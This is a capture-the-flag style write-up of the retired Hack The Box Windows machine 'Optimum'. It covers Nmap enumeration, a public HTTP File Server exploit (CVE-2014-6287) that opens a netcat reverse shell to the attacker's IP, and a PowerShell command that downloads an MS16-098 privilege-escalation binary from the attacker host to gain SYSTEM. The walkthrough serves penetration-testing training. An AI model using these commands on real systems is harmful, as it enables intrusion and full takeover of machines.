Hack The Box Optimum Writeup
Hack The Box (HTB) is an online training platform to enhance skills in penetration testing. Optimum is a retired Windows-based box having IP 10.10.10.8.
|Release||18 March 2017|
Start with Nmap
Run Nmap default scripts (-sC) and enumerate versions (-sV).
#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt
To check all open ports
#nmap -p- 10.10.10.8 | tee nmap-all-ports.txt
Run UDP scan
#nmap -sU 10.10.10.8
As port 80 is open, try IP on web browser
Search on google to find exploit of HTTP File Server 2.3 and found CVE:2014-6287.
Read instruction to execute the payload
Identify nc.exe on Kali and copy it in current directory
Edit payload with local IP and port. Save it. Use ifconfig to identify the IP address of your machine.
ip_addr = "10.10.14.16"
local_port = "1111"
Execute the exploit
#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 10.10.10.8 80
Got shell. Check user token
Use systeminfo to identify information of OS
Copy this output in text format (I have copied it in config-info.txt). Identify vulnerability by checking patches by using github repository code. Run privilege escalation exploit code by using below command:
Many exploits available for privilege escalation. I have used "Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)". You can downlaod 41020.exe by using github repository.
Transfer exe file to machine and execute it by using below command to get system.
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
Check by command "whoami". If output is below, got system.
This article is a quick write-up on HTB Optimum Windows box. If you have some issues in any step, let me know in the comment section.
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.